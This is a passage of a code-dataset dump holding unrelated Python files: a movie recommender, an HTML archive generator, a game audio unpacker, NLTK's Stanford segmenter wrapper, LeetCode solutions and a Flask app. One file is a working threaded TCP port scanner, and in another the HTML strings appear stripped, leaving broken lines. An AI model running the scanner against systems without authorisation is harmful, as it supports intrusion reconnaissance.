模型路径\n}\n","repo_name":"zhilangtaosha/AI-Trash","sub_path":"app/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"12040070801","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nnot predict the rating score, so hard to make heavy use of AlgoBase class\r\n\"\"\"\r\n\r\nfrom MovieLens import MovieLens\r\nfrom surprise import KNNBasic\r\nimport heapq\r\nfrom collections import defaultdict\r\nfrom operator import itemgetter\r\nimport MyDump\r\n\r\n\r\ntestSubject = '85' # raw userId\r\nk = 10\r\n\r\n# Load our data set and compute the user similarity matrix\r\nml = None\r\ndata = None\r\nml, data, _ = MyDump.LoadMovieLensData(True)\r\nif ml == None or data == None:\r\n ml = MovieLens()\r\n data = ml.loadMovieLensLatestSmall()\r\n\r\nprint(f'testUser {testSubject}, the ratings are:')\r\nfor (movieID, rating) in sorted(ml.getUserRatings(int(testSubject)), key=lambda x: x[1], reverse = True):\r\n print(f'\\t{ml.movieID_to_name[movieID]}\\t:{rating}')\r\n\r\n\r\n\r\ntrainSet = data.build_full_trainset()\r\n\r\nsim_options = {'name': 'cosine',\r\n 'user_based': True\r\n }\r\n\r\nsimsMatrix = None\r\n_,_,simsMatrix = MyDump.Load('user_similarity',1)\r\nif simsMatrix is None:\r\n\r\n model = KNNBasic(sim_options=sim_options)\r\n model.fit(trainSet) # calculate the similarity\r\n simsMatrix = model.compute_similarities()\r\n\r\n MyDump.Save('user_similarity', data = simsMatrix, verbose = 1)\r\n\r\n\r\n# Get top N similar users to our test subject\r\n# (Alternate approach would be to select users up to some similarity threshold - try it!)\r\ntestUserInnerID = trainSet.to_inner_uid(testSubject)\r\nsimilarityRow = simsMatrix[testUserInnerID]\r\n\r\nsimilarUsers = []\r\nfor innerID, score in enumerate(similarityRow):\r\n if (innerID != testUserInnerID):\r\n similarUsers.append( (innerID, score) )\r\n\r\n\r\n# kNeighbors = heapq.nlargest(k, similarUsers, key=lambda t: t[1])\r\n# Inception (2010) 3.3\r\n# Star Wars: Episode V - The Empire Strikes Back (1980) 2.4\r\n# Bourne Identity, The (1988) 2.0\r\n# Crouching Tiger, Hidden Dragon (Wo hu cang long) (2000) 2.0\r\n# Dark Knight, The (2008) 2.0\r\n# Good, the Bad and the Ugly, The (Buono, il brutto, il cattivo, Il) (1966) 1.9\r\n# Departed, The (2006) 1.9\r\n# Dark Knight Rises, The (2012) 1.9\r\n# Back to the Future (1985) 1.9\r\n# Gravity (2013) 1.8\r\n# Fight Club (1999) 1.8\r\n\r\n# get similar users by threshold\r\nkNeighbors = []\r\nfor rating in similarUsers:\r\n if rating[1] > 0.95:\r\n kNeighbors.append(rating)\r\n# Star Wars: Episode IV - A New Hope (1977) 114.57068319140309\r\n# Matrix, The (1999) 107.72095292088618\r\n# Star Wars: Episode V - The Empire Strikes Back (1980) 88.09116645357186\r\n# Fight Club (1999) 79.26558201621258\r\n# Back to the Future (1985) 78.78807368067915\r\n# Raiders of the Lost Ark (Indiana Jones and the Raiders of the Lost Ark) (1981) 78.77028125945898\r\n# American Beauty (1999) 77.32300806156537\r\n# Toy Story (1995) 76.37713266677879\r\n# Godfather, The (1972) 76.21072562503657\r\n# Star Wars: Episode VI - Return of the Jedi (1983) 74.71908773556109\r\n# Lord of the Rings: The Fellowship of the Ring, The (2001) 74.37234120218191\r\n\r\n\r\n# Get the stuff they rated, and add up ratings for each item, weighted by user similarity\r\ncandidates = defaultdict(float)\r\nfor similarUser in kNeighbors:\r\n innerID = similarUser[0]\r\n userSimilarityScore = similarUser[1]\r\n theirRatings = trainSet.ur[innerID]\r\n for rating in theirRatings:\r\n candidates[rating[0]] += (rating[1] / 5.0) * userSimilarityScore\r\n\r\n# Build a dictionary of stuff the user has already seen\r\nwatched = {}\r\nfor itemID, rating in trainSet.ur[testUserInnerID]:\r\n watched[itemID] = 1\r\n\r\n# Get top-rated items from similar users:\r\npos = 0\r\nfor itemID, ratingSum in sorted(candidates.items(), key=itemgetter(1), reverse=True):\r\n if not itemID in watched:\r\n movieID = trainSet.to_raw_iid(itemID)\r\n print(ml.getMovieName(int(movieID)), ratingSum)\r\n pos += 1\r\n if (pos > 10):\r\n break\r\n","repo_name":"yuanpaner/Recommender_prj","sub_path":"UserCF.py","file_name":"UserCF.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6444913766","text":"from lxml import etree as ET\n\ndef background(iterationvalue):\n colours = {0: 'white', 1:'lightblue'}\n return colours.get(iterationvalue % 2)\n\n\ndocument = open('arkiverad_kanal.xml', encoding='utf-8')\ntree = ET.parse(document)\niteration = 0\n\nposts = tree.findall('/post')\nsortingdict = {}\nhtml_document = open('insta.html', 'w', encoding=\"utf8\")\nhtml_document.write('\\n\\n\\n')\nhtml_document.write('\\n\\n\\n
')\n\n\n\nfor post in posts:\n datum = post.find('metadata/publishDate')\n sortingdict.update({datum.text: post})\n\nfor k,v in sorted(sortingdict.items(),reverse=True):\n html_document.write(f'
\\n')\n publish_date = v.find('metadata/publishDate')\n post_title = v.find('metadata/title')\n post_message = v.find('metadata/postMessage')\n share_title = v.find('resources/share/title')\n share_description = v.find('resources/share/description')\n resources = v.findall('resources/file')\n comments = v.findall('comments/comment')\n likes = v.find('metadata/likeCount')\n shares = v.find('metadata/shareCount')\n\n if resources is not None:\n for resorce in resources:\n print(resorce.attrib['name'])\n link = resorce.attrib['name']\n if link.endswith('.mp4'):\n html_document.write(f'\\n')\n else:\n html_document.write(f'\"picture\"\\n')\n\n dateslice = publish_date.text.split('T')\n dateyear = dateslice[0]\n datetime = dateslice[1].split('.')[0]\n print(datetime)\n html_document.write(f'
{dateyear} {datetime}
\\n')\n iteration += 1\n if post_message is not None:\n #html_document.write(f'

{post_title.text}

')\n html_document.write(f'

{post_message.text}

')\n if share_description is not None:\n html_document.write(f'

{share_title.text}

')\n html_document.write(f'

{share_description.text}

')\n\n if (shares is not None) and (likes is not None):\n html_document.write(f'

Likes: {likes.text} Delningar: {shares.text}

')\n\n if comments is not None:\n for comment in comments:\n comment_message = comment.find('message')\n comment_author = comment.find('author')\n comment_create_time = comment.find('createTime')\n comment_dateslice = publish_date.text.split('T')\n comment_dateyear = comment_dateslice[0]\n comment_datetime = comment_dateslice[1].split('.')[0]\n\n html_document.write(f'
\\n
{comment_dateyear} {comment_datetime}
\\n

{comment_author.text} - {comment_message.text}

\\n
')\n\n\n html_document.write('\\n
')\n\nhtml_document.write('
')\n\n\n\n\n","repo_name":"Viktor-Lundberg/Eplicta_archive_API","sub_path":"Generate_html.py","file_name":"Generate_html.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14406614290","text":"import json\nimport logging\nimport pathlib\nimport subprocess\nimport threading\nimport zipfile\n\nimport tqdm\n\nfrom gfunpack import utils\n\n_logger = logging.getLogger('gfunpack.utils')\n_warning = _logger.warning\n\n\ndef _test_vgmstream():\n try:\n subprocess.run([\n 'vgmstream-cli',\n '-V',\n ], stdout=subprocess.DEVNULL)\n except FileNotFoundError:\n raise FileNotFoundError('vgmstream-cli is required to unpack sound files')\n\n\ndef _extract_zip(path: pathlib.Path, directory: pathlib.Path, force: bool = False):\n with zipfile.ZipFile(path) as z:\n extracted: list[pathlib.Path] = []\n for file in z.filelist:\n output = directory.joinpath(file.filename)\n if force or not (\n output.is_file() # *.acb.bytes\n or output.with_suffix('').is_file() # *.acb\n or output.with_suffix('').with_suffix('.wav').is_file() # *.wav\n or output.with_suffix('').with_suffix('.m4a').is_file() # *.m4a\n ):\n z.extract(file, directory)\n extracted.append(output)\n return extracted\n\n\ndef _test_ffmpeg():\n try:\n subprocess.run([\n 'ffmpeg',\n '-h',\n ], stdout=subprocess.DEVNULL).check_returncode()\n except FileNotFoundError:\n raise FileNotFoundError('ffmpeg is required to transcode audio files')\n \n\ndef _transcode_files(files: list[pathlib.Path], force: bool, concurrency: int, clean: bool,\n bar: tqdm.tqdm | None = None):\n semaphore = threading.Semaphore(concurrency)\n def transcode(file: pathlib.Path, output: pathlib.Path):\n nonlocal clean, force, semaphore\n if force or not output.is_file():\n subprocess.run([\n 'ffmpeg',\n '-hide_banner',\n '-loglevel',\n 'error',\n '-i',\n file,\n output,\n ]).check_returncode()\n if clean:\n file.unlink()\n semaphore.release()\n\n converted: dict[str, pathlib.Path] = {}\n for file in files:\n semaphore.acquire()\n output = file.with_suffix('.m4a')\n threading.Thread(target=transcode, args=(file, output)).start()\n converted[file.stem] = output\n if bar:\n bar.update()\n\n for _ in range(concurrency):\n semaphore.acquire()\n return converted\n\n\ndef _extract_acb_to_wav(dat: pathlib.Path, destination: pathlib.Path,\n semaphore: threading.Semaphore | None = None,\n force: bool = False,\n clean: bool = True):\n acb_audios = _extract_zip(dat, destination, force=force)\n assert len(acb_audios) <= 1\n if len(acb_audios) == 1:\n acb = acb_audios[0]\n assert acb.suffix == '.bytes'\n acb = acb.rename(acb.with_suffix(''))\n subprocess.run([\n 'vgmstream-cli',\n acb,\n '-o',\n destination.joinpath('?n.wav'),\n '-S',\n '0',\n ], stdout=subprocess.DEVNULL).check_returncode()\n if clean:\n acb.unlink()\n else:\n acb = None\n if semaphore is not None:\n semaphore.release()\n return acb\n\n\nclass BGM:\n directory: pathlib.Path\n\n destination: pathlib.Path\n\n se_destination: pathlib.Path\n\n resource_files: list[pathlib.Path]\n\n se_resource_file: pathlib.Path\n\n extracted: dict[str, pathlib.Path]\n\n force: bool\n\n concurrency: int\n\n clean: bool\n\n def __init__(self, directory: str, destination: str,\n force: bool = False, concurrency: int = 8, clean: bool = True) -> None:\n self.directory = utils.check_directory(directory)\n self.destination = utils.check_directory(pathlib.Path(destination).joinpath('bgm'), create=True)\n self.se_destination = utils.check_directory(pathlib.Path(destination).joinpath('se'), create=True)\n self.force = force\n self.concurrency = concurrency\n self.clean = clean\n self.resource_files = list(f for f in self.directory.glob('*acb3030.dat') if 'AVGacb3030' not in f.stem)\n self.se_resource_file = list(self.directory.glob('*AVGacb3030.dat'))[0]\n _test_ffmpeg()\n self.extracted = self.extract_and_convert()\n\n def extract_all(self, resource_files: list[pathlib.Path]):\n _test_vgmstream()\n semaphore = threading.Semaphore(self.concurrency)\n for file in resource_files:\n semaphore.acquire()\n threading.Thread(\n target=_extract_acb_to_wav,\n args=(file, self.destination, semaphore, self.force, self.clean),\n ).start()\n for _ in range(self.concurrency):\n semaphore.acquire()\n return list(self.destination.glob('*.wav'))\n\n def _get_audio_template(self):\n content = utils.read_text_asset(list(self.directory.glob('*assettextes.ab'))[0], 'assets/resources/textdata/audiotemplate.txt')\n mapping: dict[str, str] = {}\n for line in (l.strip() for l in content.split('\\n')):\n if '//' in line:\n comment_index = line.index('//')\n line = line[:comment_index].strip()\n if line == '' or '|' not in line:\n continue\n fields = line.split('|')\n assert len(fields) >= 4 or (len(fields) == 3 and fields[1] in [\n 'Skip',\n 'UI_dsExstart',\n 'UI_dsMissionStart',\n 'UI_dsenemy',\n 'UI_dsLogin',\n 'BGM_PAUSE',\n 'BGM_UNPAUSE',\n ]), line\n name, file = fields[1:3]\n mapping[name] = file\n return mapping\n\n def extract_and_convert(self):\n _extract_acb_to_wav(self.se_resource_file, self.se_destination, None, self.force, self.clean)\n files = _transcode_files(\n list(self.se_destination.glob('*.wav')),\n self.force,\n self.concurrency,\n self.clean,\n )\n bar = tqdm.tqdm(total=len(self.resource_files))\n batch_count = min(self.concurrency * 8, 32) if self.clean else len(self.resource_files)\n for i in range(0, len(self.resource_files), batch_count):\n batch = self.resource_files[i : i + batch_count]\n files.update(_transcode_files(\n self.extract_all(batch),\n self.force,\n self.concurrency,\n self.clean,\n bar,\n ))\n bar.close()\n files.update((existing.stem, existing) for existing in self.destination.glob('*.m4a'))\n files.update((existing.stem, existing) for existing in self.se_destination.glob('*.m4a'))\n\n name_mapping = self._get_audio_template()\n mapping: dict[str, pathlib.Path] = {}\n for name, audio_name in name_mapping.items():\n if audio_name in files:\n mapping[name] = files[audio_name].relative_to(self.destination.parent)\n elif name in files:\n mapping[name] = files[name].relative_to(self.destination.parent)\n else:\n _warning('audio identifier %s not found', name)\n mapped_files = set(mapping.values())\n for audio_name, file in files.items():\n path = file.relative_to(self.destination.parent)\n if path not in mapped_files:\n mapping[audio_name] = path\n return mapping\n\n def save(self):\n path = self.destination.parent.joinpath('audio.json')\n with path.open('w') as f:\n f.write(json.dumps(dict((k, str(v)) for k, v in self.extracted.items()), indent=2, ensure_ascii=False))\n return path\n","repo_name":"gudzpoz/gfStory","sub_path":"unpack/src/gfunpack/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30399699937","text":"import json\nimport os\nimport tempfile\nimport warnings\nfrom subprocess import PIPE\n\nfrom nltk.internals import (\n _java_options,\n config_java,\n find_dir,\n find_file,\n find_jar,\n java,\n)\nfrom nltk.tokenize.api import TokenizerI\n\n_stanford_url = \"https://nlp.stanford.edu/software\"\n\n\nclass StanfordSegmenter(TokenizerI):\n \"\"\"Interface to the Stanford Segmenter\n\n If stanford-segmenter version is older than 2016-10-31, then path_to_slf4j\n should be provieded, for example::\n\n seg = StanfordSegmenter(path_to_slf4j='/YOUR_PATH/slf4j-api.jar')\n\n >>> from nltk.tokenize.stanford_segmenter import StanfordSegmenter\n >>> seg = StanfordSegmenter() # doctest: +SKIP\n >>> seg.default_config('zh') # doctest: +SKIP\n >>> sent = u'这是斯坦福中文分词器测试'\n >>> print(seg.segment(sent)) # doctest: +SKIP\n \\u8fd9 \\u662f \\u65af\\u5766\\u798f \\u4e2d\\u6587 \\u5206\\u8bcd\\u5668 \\u6d4b\\u8bd5\n \n >>> seg.default_config('ar') # doctest: +SKIP\n >>> sent = u'هذا هو تصنيف ستانفورد العربي للكلمات'\n >>> print(seg.segment(sent.split())) # doctest: +SKIP\n \\u0647\\u0630\\u0627 \\u0647\\u0648 \\u062a\\u0635\\u0646\\u064a\\u0641 \\u0633\\u062a\\u0627\\u0646\\u0641\\u0648\\u0631\\u062f \\u0627\\u0644\\u0639\\u0631\\u0628\\u064a \\u0644 \\u0627\\u0644\\u0643\\u0644\\u0645\\u0627\\u062a\n \n \"\"\"\n\n _JAR = \"stanford-segmenter.jar\"\n\n def __init__(\n self,\n path_to_jar=None,\n path_to_slf4j=None,\n java_class=None,\n path_to_model=None,\n path_to_dict=None,\n path_to_sihan_corpora_dict=None,\n sihan_post_processing=\"false\",\n keep_whitespaces=\"false\",\n encoding=\"UTF-8\",\n options=None,\n verbose=False,\n java_options=\"-mx2g\",\n ):\n # Raise deprecation warning.\n warnings.simplefilter(\"always\", DeprecationWarning)\n warnings.warn(\n str(\n \"\\nThe StanfordTokenizer will \"\n \"be deprecated in version 3.2.5.\\n\"\n \"Please use \\033[91mnltk.parse.corenlp.CoreNLPTokenizer\\033[0m instead.'\"\n ),\n DeprecationWarning,\n stacklevel=2,\n )\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n\n stanford_segmenter = find_jar(\n self._JAR,\n path_to_jar,\n env_vars=(\"STANFORD_SEGMENTER\",),\n searchpath=(),\n url=_stanford_url,\n verbose=verbose,\n )\n if path_to_slf4j is not None:\n slf4j = find_jar(\n \"slf4j-api.jar\",\n path_to_slf4j,\n env_vars=(\"SLF4J\", \"STANFORD_SEGMENTER\"),\n searchpath=(),\n url=_stanford_url,\n verbose=verbose,\n )\n else:\n slf4j = None\n\n # This is passed to java as the -cp option, the old version of segmenter needs slf4j.\n # The new version of stanford-segmenter-2016-10-31 doesn't need slf4j\n self._stanford_jar = os.pathsep.join(\n _ for _ in [stanford_segmenter, slf4j] if _ is not None\n )\n\n self._java_class = java_class\n self._model = path_to_model\n self._sihan_corpora_dict = path_to_sihan_corpora_dict\n self._sihan_post_processing = sihan_post_processing\n self._keep_whitespaces = keep_whitespaces\n self._dict = path_to_dict\n\n self._encoding = encoding\n self.java_options = java_options\n options = {} if options is None else options\n self._options_cmd = \",\".join(\n f\"{key}={json.dumps(val)}\" for key, val in options.items()\n )\n\n def default_config(self, lang):\n \"\"\"\n Attempt to initialize Stanford Word Segmenter for the specified language\n using the STANFORD_SEGMENTER and STANFORD_MODELS environment variables\n \"\"\"\n\n search_path = ()\n if os.environ.get(\"STANFORD_SEGMENTER\"):\n search_path = {os.path.join(os.environ.get(\"STANFORD_SEGMENTER\"), \"data\")}\n\n # init for Chinese-specific files\n self._dict = None\n self._sihan_corpora_dict = None\n self._sihan_post_processing = \"false\"\n\n if lang == \"ar\":\n self._java_class = (\n \"edu.stanford.nlp.international.arabic.process.ArabicSegmenter\"\n )\n model = \"arabic-segmenter-atb+bn+arztrain.ser.gz\"\n\n elif lang == \"zh\":\n self._java_class = \"edu.stanford.nlp.ie.crf.CRFClassifier\"\n model = \"pku.gz\"\n self._sihan_post_processing = \"true\"\n\n path_to_dict = \"dict-chris6.ser.gz\"\n try:\n self._dict = find_file(\n path_to_dict,\n searchpath=search_path,\n url=_stanford_url,\n verbose=False,\n env_vars=(\"STANFORD_MODELS\",),\n )\n except LookupError as e:\n raise LookupError(\n \"Could not find '%s' (tried using env. \"\n \"variables STANFORD_MODELS and /data/)\"\n % path_to_dict\n ) from e\n\n sihan_dir = \"./data/\"\n try:\n path_to_sihan_dir = find_dir(\n sihan_dir,\n url=_stanford_url,\n verbose=False,\n env_vars=(\"STANFORD_SEGMENTER\",),\n )\n self._sihan_corpora_dict = os.path.join(path_to_sihan_dir, sihan_dir)\n except LookupError as e:\n raise LookupError(\n \"Could not find '%s' (tried using the \"\n \"STANFORD_SEGMENTER environment variable)\" % sihan_dir\n ) from e\n else:\n raise LookupError(f\"Unsupported language {lang}\")\n\n try:\n self._model = find_file(\n model,\n searchpath=search_path,\n url=_stanford_url,\n verbose=False,\n env_vars=(\"STANFORD_MODELS\", \"STANFORD_SEGMENTER\"),\n )\n except LookupError as e:\n raise LookupError(\n \"Could not find '%s' (tried using env. \"\n \"variables STANFORD_MODELS and /data/)\" % model\n ) from e\n\n def tokenize(self, s):\n super().tokenize(s)\n\n def segment_file(self, input_file_path):\n \"\"\" \"\"\"\n cmd = [\n self._java_class,\n \"-loadClassifier\",\n self._model,\n \"-keepAllWhitespaces\",\n self._keep_whitespaces,\n \"-textFile\",\n input_file_path,\n ]\n if self._sihan_corpora_dict is not None:\n cmd.extend(\n [\n \"-serDictionary\",\n self._dict,\n \"-sighanCorporaDict\",\n self._sihan_corpora_dict,\n \"-sighanPostProcessing\",\n self._sihan_post_processing,\n ]\n )\n\n stdout = self._execute(cmd)\n\n return stdout\n\n def segment(self, tokens):\n return self.segment_sents([tokens])\n\n def segment_sents(self, sentences):\n \"\"\" \"\"\"\n encoding = self._encoding\n # Create a temporary input file\n _input_fh, self._input_file_path = tempfile.mkstemp(text=True)\n\n # Write the actural sentences to the temporary input file\n _input_fh = os.fdopen(_input_fh, \"wb\")\n _input = \"\\n\".join(\" \".join(x) for x in sentences)\n if isinstance(_input, str) and encoding:\n _input = _input.encode(encoding)\n _input_fh.write(_input)\n _input_fh.close()\n\n cmd = [\n self._java_class,\n \"-loadClassifier\",\n self._model,\n \"-keepAllWhitespaces\",\n self._keep_whitespaces,\n \"-textFile\",\n self._input_file_path,\n ]\n if self._sihan_corpora_dict is not None:\n cmd.extend(\n [\n \"-serDictionary\",\n self._dict,\n \"-sighanCorporaDict\",\n self._sihan_corpora_dict,\n \"-sighanPostProcessing\",\n self._sihan_post_processing,\n ]\n )\n\n stdout = self._execute(cmd)\n\n # Delete the temporary file\n os.unlink(self._input_file_path)\n\n return stdout\n\n def _execute(self, cmd, verbose=False):\n encoding = self._encoding\n cmd.extend([\"-inputEncoding\", encoding])\n _options_cmd = self._options_cmd\n if _options_cmd:\n cmd.extend([\"-options\", self._options_cmd])\n\n default_options = \" \".join(_java_options)\n\n # Configure java.\n config_java(options=self.java_options, verbose=verbose)\n\n stdout, _stderr = java(\n cmd, classpath=self._stanford_jar, stdout=PIPE, stderr=PIPE\n )\n stdout = stdout.decode(encoding)\n\n # Return java configurations to their default values.\n config_java(options=default_options, verbose=False)\n\n return stdout\n","repo_name":"nltk/nltk","sub_path":"nltk/tokenize/stanford_segmenter.py","file_name":"stanford_segmenter.py","file_ext":"py","file_size_in_byte":9196,"program_lang":"python","lang":"en","doc_type":"code","stars":12541,"dataset":"github-code","pt":"75"} +{"seq_id":"22005565777","text":"# Given an array of integers, find two numbers such that they add up to a specific target number\n'''\nThe function should return indices of the two numbers where index1 must be less than index2\nInput: numbers={2, 7, 11, 15}, target=9\nOutput: index1=1, index2=2\nNote that the array index starts from 1 instead of 0\n'''\n\nclass Item:\n def __init__(self, value, index):\n self.value = value\n self.index = index\n\ndef twoSum(num, target):\n len_num = len(num)\n if 0 == len_num:\n return (-1, -1)\n\n items = [Item(value, 0) for value in num]\n for i in range(0, len_num):\n items[i].index = i + 1\n items.sort(lambda x, y: cmp(x.value, y.value))\n index1 = 0\n index2 = len_num - 1\n is_find = False\n while index1 < index2:\n total = items[index1].value + items[index2].value\n if total < target:\n index1 += 1\n elif total > target:\n index2 -= 1\n else:\n is_find = True\n break\n (index1, index2) = (index1, index2) if items[index1].index <= items[index2].index else (index2, index1)\n return (items[index1].index, items[index2].index) if is_find else (-1, -1)\n\nnumbers = [2, 7, 11, 15]\ntarget = 9\ntwoSum(numbers, target)\n\n","repo_name":"helen5haha/pylee","sub_path":"number/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28594979094","text":"from flask import Flask, render_template, request\r\nfrom script import predict_price\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index1.html')\r\n\r\n@app.route('/form', methods=[\"GET\",\"POST\"])\r\ndef form():\r\n if request.method == \"POST\":\r\n loc = request.form.get(\"location\")\r\n sqft = request.form.get(\"sqft\")\r\n bath = request.form.get(\"bath\")\r\n bhk = request.form.get(\"bhk\")\r\n x = predict_price(loc, int(sqft), int(bath), int(bhk))\r\n x=list(str(x))\r\n s=x[:5]\r\n r=\"\".join(s)\r\n return render_template('index1.html', ans=r)\r\n\r\napp.run(debug=True)","repo_name":"jaisaishankar16/Real-Estate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29608756547","text":"class Solution:\n def maximumTop(self, nums: List[int], k: int) -> int:\n n = len(nums)\n if n == 1 and k % 2 == 1:\n return -1\n elif n == 1:\n return nums[0]\n\n big = nums.copy()\n for i in range(1, n):\n big[i] = max(big[i], big[i - 1])\n\n if k > n:\n return big[n - 1]\n if k == n:\n return big[n - 2]\n if k == 0:\n return nums[0]\n if k == 1:\n return nums[1]\n\n # 结果一定是0 - n-2的最大项或者n项\n return max(big[k - 2], nums[k])","repo_name":"CA2528357431/leetcode-note","sub_path":"LIST2/0606 2202.py","file_name":"0606 2202.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"10113274910","text":"import socket \nimport sys \nimport time \nimport threading \nuser_input = \"YOU NEED TO ENTER:::python3 port_scan.py target start_port end_port\" \n \nprint(\"*\"*60) \nprint(\"python simple port sacnner\") \nprint(\"*\"*60) \n \nif(len(sys.argv))!=4: \n print(user_input) \n sys.exit() \n \ntry: \n target = socket.gethostbyname(sys.argv[1]) \nexcept socket.gaierror: \n print(\"Name Resolution error\") \n sys.exit() \nstart_port = int(sys.argv[2]) \nend_port = int(sys.argv[3]) \n \nprint(\"scanning target:\",target) \ndef scan_port(port): \n print(\"scanning port:\",port) \n server = socket.socket(socket.AF_INET , socket.SOCK_STREAM) \n server.settimeout(2) \n conn = server.connect_ex((target,port)) #is there any error occure that port will terminate then continue to another port \n if conn == 0: \n print(\"port {} is OPEN\",format(port)) \n server.close() \n \nfor port in range(start_port , end_port+1): \n thread = threading.Thread (target = scan_port , args = (port,)).start() \n #thread.start()\n","repo_name":"MNaresh010/port_scanner","sub_path":"port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14181792311","text":"'''\nstack simulation\nT: O(M + N)\nS: O(M + N)\n\n执行用时:40 ms, 在所有 Python3 提交中击败了35.63% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了89.34% 的用户\n通过测试用例:114 / 114\n'''\nclass Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n\n def simulate(u):\n uu = []\n for ch in u:\n if ch == '#':\n if uu:\n uu.pop()\n else:\n uu.append(ch)\n return uu\n\n return simulate(s) == simulate(t)\n\n\n'''\nstack simulation\nT: O(M + N)\nS: O(M + N)\n\n执行用时:36 ms, 在所有 Python3 提交中击败了63.49% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了85.91% 的用户\n通过测试用例:114 / 114\n'''\nclass Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n def build(u):\n uu = []\n for ch in u:\n if ch != '#':\n uu.append(ch)\n elif uu:\n uu.pop()\n return ''.join(uu)\n\n return build(s) == build(t)\n\n\n'''\ntwo pointers, 倒序 skip\nT: O(M + N), S: O(1)\n\n感想:\n代码写得多了,自然而然就想着复用。比如,这里把 s 和 t 同用一个函数处理。\n同时,主函数中 while 中采用 or 避免了退出 while 之后的再次讨论。\n\n执行用时:40 ms, 在所有 Python3 提交中击败了35.63% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了76.25% 的用户\n通过测试用例:114 / 114\n'''\nclass Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n ns, nt = len(s), len(t)\n i, j = ns - 1, nt - 1\n\n def findValidLetter(st, ij):\n skip = 0\n while ij >= 0:\n if st[ij] == '#':\n skip += 1\n elif skip:\n skip -= 1\n else:\n return st[ij], ij - 1\n ij -= 1\n return None, -1\n\n while i >= 0 or j >= 0:\n # find each valid letter in s and t from the end to beginning\n valid_ss, i = findValidLetter(s, i) \n valid_tt, j = findValidLetter(t, j)\n if valid_ss != valid_tt:\n return False\n\n return True\n\n\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/0844.0_Backspace_String_Compare.py","file_name":"0844.0_Backspace_String_Compare.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24868306891","text":"# Source: https://www.youtube.com/watch?v=LPFhl65R7ww\r\n\r\n\r\ndef median_sorted(num1, num2):\r\n maxValue, minValue = float('inf'), float('-inf')\r\n n1, n2 = len(num1), len(num2)\r\n low, high = 0, n1-1\r\n\r\n while low <= high:\r\n partitionX = low + (high-low)//2\r\n partitionY = (n1 + n2 + 1)//2 - partitionX\r\n\r\n maxLeftX = num1[partitionX-1] if partitionX else minValue\r\n minRightX = num1[partitionX] if partitionX else maxValue\r\n maxLeftY = num2[partitionY-1] if partitionY else minValue\r\n minRightY = num2[partitionY] if partitionY else maxValue\r\n\r\n if maxLeftX <= minRightY and maxLeftY <= minRightX:\r\n if not (n1 + n2) % 2:\r\n return (max(maxLeftX, maxLeftY) + min(minRightX, minRightY))/2\r\n else:\r\n return max(maxLeftX, maxLeftY)\r\n elif maxLeftX > minRightY:\r\n high = partitionX - 1\r\n else:\r\n low = partitionX + 1\r\n return -1\r\n\r\nif __name__ == '__main__':\r\n print (median_sorted([1, 3, 8, 9, 15], [7, 11, 18, 19, 21, 25])) # Time: O(Log(Min(M, N))), Space: O(1)\r\n","repo_name":"royadityak94/InterviewPrep","sub_path":"Grokking/Random/optimized_median_sorted_array.py","file_name":"optimized_median_sorted_array.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34835604240","text":"\"\"\"kanimaji3\n\nConvert KanjiVG SVG into animated formats.\n\nUsage:\n kanimaji3 [-o FILE] [--format=FORMAT]\n kanimaji3 -h | --help\n kanimaji3 -V | --version\n\nOptions:\n -h --help Show this message.\n -V --version Show version.\n -o FILE --output=FILE Specify output file.\n --format=FORMAT Specify output format. [default: gif]\n\"\"\"\n\nfrom docopt import docopt, DocoptExit\n\nfrom . import create_gif\n\nif __name__ == \"__main__\":\n arguments: dict = docopt(__doc__, version=\"0.1.0\")\n target_format = arguments[\"--format\"].lower()\n if target_format not in [\"gif\"]:\n raise DocoptExit(f\"{target_format} is not one of the recognized formats: 'gif'\")\n if target_format == \"gif\":\n create_gif(arguments[\"\"], arguments[\"--output\"])\n","repo_name":"MusicOnline/kanimaji3","sub_path":"kanimaji3/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18474241305","text":"from collections.abc import Iterable\nfrom pathlib import Path\nfrom typing import Optional\n\n\nimport cv2\nimport numpy as np\nimport numpy.typing as npt\n\nfrom src.torch_utils.utils.misc import clean_print\n\n\ndef default_loader(data_path: Path,\n label_map: dict[int, str],\n limit: Optional[int] = None,\n shuffle: bool = False,\n verbose: bool = True\n ) -> tuple[npt.NDArray[np.object_], npt.NDArray[np.int64]]:\n \"\"\"Default loading function for image classification.\n\n The data folder 